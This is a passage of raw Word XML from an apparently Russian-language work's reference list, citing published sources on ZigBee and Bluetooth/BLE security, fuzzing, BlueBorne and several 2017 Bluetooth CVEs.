      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://research.kudelskisecurity.com/2017/11/21/zigbee-security-basics-part-3/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A924A9" w:rsidRPr="00A924A9" w:rsidRDefault="00A924A9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>Саттон</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> М., Грин А., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>Амини</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> П. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve">: исследование уязвимостей методом грубой силы. СПб. : Символ-Плюс, 2009. 560 с. 17. Нефедова М. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A924A9" w:rsidRPr="00A924A9" w:rsidRDefault="00A924A9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve">Уязвимость в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> ставит </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>-устройства под удар</w:t>
      </w:r>
      <w:r w:rsidR="003077A4" w:rsidRPr="003077A4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>xakep</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/2015/08/10/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>zigbee</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>devices</w:t>
        </w:r>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="00A924A9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>problems</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003077A4" w:rsidRPr="003077A4" w:rsidRDefault="003077A4" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003077A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zigbee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003077A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploited</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003077A4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>cognosec</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>zigbee</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>exploited</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>_8</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>F</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Ca</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>9.</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003802F9" w:rsidRPr="00880DF7" w:rsidRDefault="00880DF7" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth Security Issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>citeseerx</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ist</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>psu</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>edu</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>viewdoc</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>download</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doi</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>=10.1.1.735.5603&amp;</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>rep</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>rep</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>1&amp;</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>type</w:t>
        </w:r>
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003802F9" w:rsidRPr="00880DF7" w:rsidRDefault="00880DF7" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Common BLE security vulnerabilities in IoT and countermeasures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.simform.com/ble-iot-security-vulnerability-countermeasures/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00880DF7" w:rsidRPr="00880DF7" w:rsidRDefault="00880DF7" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Attack Vector “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” Exposes Almost Every Connected Device.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.armis.com/blueborne/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-1000251. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-1000251.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-1000250. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-1000250.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-0785. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
